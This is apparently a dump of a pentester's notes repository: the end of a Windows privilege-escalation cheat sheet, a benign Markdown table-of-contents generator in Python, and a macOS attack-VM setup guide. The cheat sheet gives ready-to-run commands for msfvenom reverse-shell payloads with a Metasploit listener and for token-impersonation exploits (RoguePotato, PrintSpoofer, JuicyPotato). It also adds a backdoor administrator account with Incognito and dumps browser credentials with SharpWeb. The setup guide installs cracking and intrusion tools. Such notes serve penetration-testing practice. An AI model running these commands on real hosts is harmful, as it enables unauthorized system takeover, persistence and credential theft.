Give user full permissions to the file/folder: 554 | ```cmd 555 | icacls "" /q /c /t /grant :F 556 | ``` 557 | 558 | ## Token impersonation _(RoguePotato)_ 559 | - Works with `SeImpersonatePrivilege` or/and `SeAssignPrimaryTokenPrivilege` enabled. 560 | - Prepare the exploit and the reverse shell: 561 | ```bash 562 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 563 | cp ~/pentesting-tools/roguepotato/RoguePotato.exe ./roguepotato.exe 564 | ``` 565 | - [Copy to the target](#copy-files-fromto-the-target) 566 | - Run socat port redirection on Kali _(choose another port if 9999 is in use on the target)_: 567 | ```bash 568 | sudo socat tcp-listen:135,reuseaddr,fork tcp::9999 569 | ``` 570 | - Run exploit: 571 | ```cmd 572 | .\roguepotato.exe -r -l 9999 -e .\shell.exe 573 | ``` 574 | 575 | ## Token impersonation _(PrintSpoofer)_ 576 | - Works with `SeImpersonatePrivilege` enabled. 577 | - Prepare: 578 | ```bash 579 | cp ~/pentesting-tools/printspoofer/PrintSpoofer64.exe ./printspoofer.exe 580 | ``` 581 | - [Copy to the target](#copy-files-fromto-the-target) 582 | - Run: 583 | ```cmd 584 | .\printspoofer.exe -i -c powershell.exe 585 | ``` 586 | 587 | ## Token impersonation _(JuicyPotato)_ 588 | - Works with `SeImpersonatePrivilege` or/and `SeAssignPrimaryTokenPrivilege` enabled _(use RoguePotato or PrintSpoofer on the latest Windows versions)_. 589 | - Prepare: 590 | ```bash 591 | cp ~/pentesting-tools/juicypotato/JuicyPotato.exe ./juicypotato.exe 592 | cp ~/pentesting-tools/juicypotato/JuicyPotato86.exe ./juicypotato.exe # X86 version 593 | 594 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 595 | ``` 596 | - [Copy to the target](#copy-files-fromto-the-target) 597 | - Choose CLSID _(https://github.com/ohpe/juicy-potato/tree/master/CLSID)_. 
598 | - Run: 599 | ```cmd 600 | .\juicypotato.exe -l 1337 -p .\shell.exe -t * -c 601 | ``` 602 | 603 | ## Token impersonation _(Incognito)_ 604 | - Works with `SeImpersonatePrivilege` and `SeDebugPrivilege` enabled _(use RoguePotato or PrintSpoofer on the latest Windows versions)_. 605 | - Prepare: 606 | ```bash 607 | cp ~/pentesting-tools/incognito/incognito.exe ./incognito.exe 608 | ``` 609 | - [Copy to the target](#copy-files-fromto-the-target) 610 | - Add privesc user with admin rights: 611 | ```cmd 612 | .\incognito.exe add_user privesc 123456 613 | .\incognito.exe add_localgroup_user Administrators privesc 614 | ``` 615 | 616 | ## Retrieving browser files _(SharpWeb)_ 617 | - Prepare: 618 | ```bash 619 | cp ~/pentesting-tools/sharpweb/SharpWeb.exe ./sharpweb.exe 620 | ``` 621 | - [Copy to the target](#copy-files-fromto-the-target) 622 | - Run: 623 | ```cmd 624 | .\sharpweb.exe all 625 | ``` 626 | 627 | ## Meterpreter's getsystem exploit 628 | - This tool requires your user to be a local admin or to have `SeDebugPrivilege` _(x86 only)_. 
629 | - Prepare the meterpreter shell: 630 | ```bash 631 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 632 | ``` 633 | - [Copy to the target](#copy-files-fromto-the-target) 634 | - Listen to the reverse shell: 635 | ```bash 636 | msfconsole -q 637 | use exploit/multi/handler 638 | set payload windows/x64/meterpreter/reverse_tcp 639 | set lhost 640 | set lport 443 641 | run 642 | ``` 643 | - Run shell: 644 | ```cmd 645 | .\shell.exe 646 | ``` 647 | - Privesc using metasploit: 648 | ```bash 649 | use priv 650 | getsystem 651 | ``` 652 | -------------------------------------------------------------------------------- /toc_generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import argparse 3 | import logging 4 | import os 5 | import re 6 | 7 | USAGE = "python3 toc_generator.py" 8 | DESCRIPTION = """\ 9 | Generates tables of contents for markdown files in the current folder. \ 10 | Add regex patterns for files the script should ignore to the .tocignore file in the current folder. 11 | """ 12 | 13 | IGNORE_FILE_NAME = ".tocignore" 14 | LVL2_HEADING_PATTERN = re.compile("(?m)^#{2}(?!#)(.*)") 15 | 16 | 17 | def run(): 18 | logging.info("Generating tables of contents...") 19 | filenames = get_filenames() 20 | 21 | if not filenames: 22 | logging.warning("No markdown files found!") 23 | return 24 | logging.debug("Working with files: " + str(filenames)) 25 | 26 | for filename in filenames: 27 | generate_toc(filename) 28 | 29 | logging.info("Done!") 30 | 31 | 32 | def generate_toc(filename): 33 | with open(filename, mode="r+") as file: 34 | content_lines = file.read().splitlines(True) 35 | 36 | if not content_lines[0].startswith("#"): 37 | logging.warning("File " + filename + " doesn't start with a header. 
Skipping...") 38 | return 39 | 40 | first_header_index = -1 41 | for i in range(1, len(content_lines)): 42 | if LVL2_HEADING_PATTERN.match(content_lines[i]): 43 | first_header_index = i 44 | break 45 | elif content_lines[i].startswith('#'): 46 | logging.warning( 47 | "File " + filename + " has another header between lvl1 and the first lvl2 headers. Skipping...") 48 | return 49 | 50 | if first_header_index == -1: 51 | logging.warning("File " + filename + " doesn't have lvl2 headers. Skipping...") 52 | return 53 | 54 | toc_str = '' 55 | code_block = False 56 | for line in content_lines[1:]: 57 | 58 | # Marks the start and end of a code block 59 | if line.startswith("```"): 60 | if code_block: 61 | code_block = False 62 | else: 63 | code_block = True 64 | 65 | # Handles the header line 66 | elif line.startswith('#'): 67 | 68 | # No lvl7 headers exist 69 | if line.startswith('#######'): 70 | continue 71 | 72 | # No headers can exist inside code blocks 73 | if code_block: 74 | continue 75 | 76 | # Adds tabulation according to the level of the header 77 | for i in range(2, len(line)): 78 | if line[i] == '#': 79 | toc_str += ' ' 80 | else: 81 | break 82 | 83 | # Adds the header's label 84 | line = line.lstrip('#').strip(' \n') 85 | toc_str += '* [' + line + ']' 86 | 87 | # Generates an anchor for the header 88 | anchor_list = list() 89 | last_underscore_i = -1 90 | to_remove = list() 91 | inline_code = False 92 | for i in range(0, len(line)): 93 | 94 | # Replaces all spaces with hyphens 95 | if line[i] == ' ' or line[i] == '-': 96 | anchor_list.append('-') 97 | 98 | # Marks a start of an inline code piece 99 | elif line[i] == '`': 100 | if inline_code: 101 | inline_code = False 102 | else: 103 | inline_code = True 104 | 105 | # Marks for removal an even number of underscores if outside the inline code piece 106 | elif line[i] == '_': 107 | if not inline_code: 108 | if last_underscore_i == -1: 109 | last_underscore_i = i 110 | anchor_list.append('_') 111 | else: 112 | 
to_remove.append(last_underscore_i) 113 | last_underscore_i = -1 114 | else: 115 | anchor_list.append('_') 116 | 117 | # Simply adds other alphanumeric chars lowercased 118 | elif line[i].isalnum(): 119 | anchor_list.append(line[i].lower()) 120 | 121 | # Removes marked characters 122 | for i in to_remove: 123 | del anchor_list[i] 124 | 125 | # Adds generated anchor to the table 126 | toc_str += '(#' + ''.join(anchor_list) + ')\n' 127 | 128 | logging.debug("Prepared the table of contents for the file %s:\n%s", filename, toc_str) 129 | 130 | # Replaces everything between lvl1 and first lvl2 headers with the table of contents 131 | content_with_toc = content_lines[0] + toc_str + os.linesep + ''.join(content_lines[first_header_index:]) 132 | 133 | file.seek(0) 134 | file.write(content_with_toc) 135 | file.truncate() 136 | logging.debug("%s file is successfully updated!", filename) 137 | 138 | 139 | def get_filenames(): 140 | ignore_patterns = set() 141 | if os.path.exists(IGNORE_FILE_NAME): 142 | with open(IGNORE_FILE_NAME, mode="r") as file: 143 | for pattern in file.readlines(): 144 | ignore_patterns.add(re.compile(''.join(c for c in pattern if c.isprintable()))) # Printable chars only 145 | 146 | current_dir = os.getcwd() 147 | filenames = set() 148 | 149 | for root, directories, files in os.walk(current_dir): 150 | for filename in files: 151 | rel_filename = os.path.join(os.path.relpath(root, current_dir), filename).removeprefix("./") 152 | if not is_file_ignored(rel_filename, ignore_patterns): 153 | filenames.add(rel_filename) 154 | return filenames 155 | 156 | 157 | def is_file_ignored(filename, patterns): 158 | if not filename.lower().endswith(".md"): 159 | return True 160 | 161 | for pattern in patterns: 162 | if pattern.match(filename): 163 | return True 164 | 165 | 166 | if __name__ == "__main__": 167 | parser = argparse.ArgumentParser(usage=USAGE, 168 | description=DESCRIPTION) 169 | parser.add_argument("-d", "--debug", action="store_true", help="set log 
level to DEBUG") 170 | args = parser.parse_args() 171 | 172 | if args.debug: 173 | logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG) 174 | else: 175 | logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO) 176 | 177 | run() 178 | -------------------------------------------------------------------------------- /vm_config/README.md: -------------------------------------------------------------------------------- 1 | # Virtual Machine Configuration 2 | * [Parallels configuration](#parallels-configuration) 3 | * [Configuring Parallels](#configuring-parallels) 4 | * [Configuring the VM (in the control center)](#configuring-the-vm-in-the-control-center) 5 | * [VM setup](#vm-setup) 6 | * [System Settings](#system-settings) 7 | * [Terminal](#terminal) 8 | * [Finder](#finder) 9 | * [Unmounting My Shared Files disk](#unmounting-my-shared-files-disk) 10 | * [Setup VPN](#setup-vpn) 11 | * [Installing and configuring useful tools](#installing-and-configuring-useful-tools) 12 | 13 | ## Parallels configuration 14 | 15 | ### Configuring Parallels 16 | 17 | - Connect devices to the host system only 18 | 19 | ### Configuring the VM (in the control center) 20 | 21 | - Install MacOS VM; 22 | - Parallels Tools on the guest VM (MacOSVM -> Install Parallels Tools). 23 | - 4 CPUs, 8GB memory, 128GB disk; 24 | - Disable Mapping Mac volumes to VM; 25 | 26 | ## VM setup 27 | 28 | ### System Settings 29 | 30 | - Turn off bluetooth; 31 | - General -> Disable AirDrop and Handoff; 32 | - General -> Sharing -> Hostname 33 | - Desktop -> Disable stage manager on Desktop; 34 | - Desktop -> Disable suggestions and recent items; 35 | - Desktop -> Disable click wallpaper to reveal Desktop; 36 | - Desktop -> Right bottom hot corner to show Desktop; 37 | - Turn off screen lock and screen saver; 38 | - Remove all items from Dock. 
39 | 40 | ### Terminal 41 | 42 | - Add to Dock; 43 | - Make Homebrew default profile; 44 | - Bump font size to 15; 45 | 46 | ### Finder 47 | 48 | - Add current user to shortcuts and remove unused ones; 49 | - Apply default group by name and sort by kind in grid view. 50 | 51 | ### Unmounting My Shared Files disk 52 | 53 | ```bash 54 | diskutil unmount /dev/disk1 # use mount command to check the name 55 | ``` 56 | 57 | ### Setup VPN 58 | 59 | - Use whatever VPN you like (you can easily reconnect in case you send too many bad requests to a target, and it blocks 60 | you); 61 | 62 | - Check VPN connection: 63 | 64 | ```bash 65 | curl https://ipinfo.io 66 | ``` 67 | 68 | ## Installing and configuring useful tools 69 | 70 | - Enter Downloads folder first: 71 | 72 | ```bash 73 | cd ~/Downloads 74 | ``` 75 | 76 | - Firefox: 77 | - Install and add to Dock; 78 | - Go to `about:config` 79 | - Set `browser.urlbar.trimURLs` to `false` 80 | - Make Firefox a default browser. 81 | - Change Home page to blank. 82 | - Delete all default bookmarks. 83 | - Disable saving passwords. 
84 | - Install command-line-tools: 85 | 86 | - Install Command-Line Tools: 87 | 88 | ```bash 89 | xcode-select --install 90 | ``` 91 | 92 | - Login to Github and add an ssh key: 93 | 94 | ```bash 95 | ssh-keygen -t ed25519 -C "" 96 | eval "$(ssh-agent -s)" 97 | ssh-add ~/.ssh/id_ed25519 98 | cat ~/.ssh/id_ed25519.pub 99 | ``` 100 | 101 | - Download pentest-tools and clean the keys: 102 | 103 | ```bash 104 | git clone git@github.com:maksyche/pentesting-tools.git ~/pentesting-tools \ 105 | && rm -rf ~/pentesting-tools/.git \ 106 | && rm -f ~/.ssh/id_ed25519 \ 107 | && rm -f ~/.ssh/id_ed25519.pub 108 | ``` 109 | 110 | - Install Homebrew: 111 | 112 | ```bash 113 | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" \ 114 | && (echo; echo 'eval "$(/opt/homebrew/bin/brew shellenv)"') >> /Users/kali/.zprofile \ 115 | && eval "$(/opt/homebrew/bin/brew shellenv)" 116 | ``` 117 | 118 | - Add more things to PATH: 119 | 120 | ```bash 121 | sudo bash -c "echo /Users/kali/Library/Python/3.9/bin >> /etc/paths" 122 | ``` 123 | 124 | - Install a bunch of useful tools: 125 | 126 | ```bash 127 | brew install wget \ 128 | && pip3 install wfuzz \ 129 | && brew install hashcat \ 130 | && brew install john-jumbo \ 131 | && brew install feroxbuster \ 132 | && brew install --cask sublime-text \ 133 | && git clone https://github.com/victorporof/Sublime-HTMLPrettify.git ~/Library/Application\ Support/Sublime\ Text/Packages/Sublime-HTMLPrettify \ 134 | && brew install openvpn \ 135 | && brew install rlwrap \ 136 | && brew install gnu-sed \ 137 | && brew install node \ 138 | && brew install brew-gem \ 139 | && brew-gem install fpm \ 140 | && brew install --cask mysql-shell \ 141 | && brew install sqlcmd \ 142 | && brew install redis \ 143 | && sudo npm install --global jwt-cracker \ 144 | && sudo pip3 install droopescan \ 145 | && pip3 install wesng \ 146 | && wget 
https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_11_0/impacket-0.11.0.tar.gz \ 147 | && tar -xzf impacket-* \ 148 | && cd impacket-0.11.0 \ 149 | && sudo pip3 install . \ 150 | && cd .. \ 151 | && brew-gem install evil-winrm \ 152 | && sudo pip3 install pyftpdlib \ 153 | && brew-gem install highline \ 154 | && sudo npm install --global xls2csv \ 155 | && sudo npm install --global xlsx2csv \ 156 | && sudo npm install --global doc2txt \ 157 | && sudo npm install --global docx2txt 158 | && sudo pip3 install oletools \ 159 | && brew install putty \ 160 | && softwareupdate --install-rosetta --agree-to-license \ 161 | && brew install --cask metasploit \ 162 | && brew install jq \ 163 | && brew install sqlmap \ 164 | && brew install name-that-hash \ 165 | && git clone https://github.com/spipm/Depix.git /Users/kali/depix \ 166 | && brew install net-snmp \ 167 | && brew install hydra \ 168 | && sudo -H pip3 install dnsrecon \ 169 | && git clone https://github.com/aboul3la/Sublist3r.git /Users/kali/sublist3r \ 170 | && sudo pip install -r /Users/kali/sublist3r/requirements.txt \ 171 | && brew install awscli \ 172 | && brew install inetutils 173 | ``` 174 | 175 | - Download dictionaries: 176 | 177 | ```bash 178 | wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt \ 179 | && gsed -i '/^\s*$/d' ~/rockyou.txt \ 180 | && git clone https://github.com/danielmiessler/SecLists.git \ 181 | && git clone https://github.com/xmendez/wfuzz.git \ 182 | && mv ./wfuzz/wordlist ~/wfuzz_wordlist \ 183 | && rm -rf ./wfuzz 184 | ``` 185 | 186 | - Nmap: https://nmap.org/download.html#macosx (open Zenmap to install Rozetta afterwards); 187 | - Burp: https://portswigger.net/burp/communitydownload (then go to http://localhost:8080/ and import the certificate to 188 | Firefox); 189 | - ZAP (Free intruder, do the same thing with the certificate): https://www.zaproxy.org/download/ 190 | - FoxyProxy for Burp: 
https://addons.mozilla.org/de/firefox/addon/foxyproxy-standard/ (then configure `127.0.0.1` `8080` 191 | proxy); 192 | - Install Python2: https://www.python.org/downloads/release/python-2718/; 193 | - Install Go: https://go.dev/dl/; --------------------------------------------------------------------------------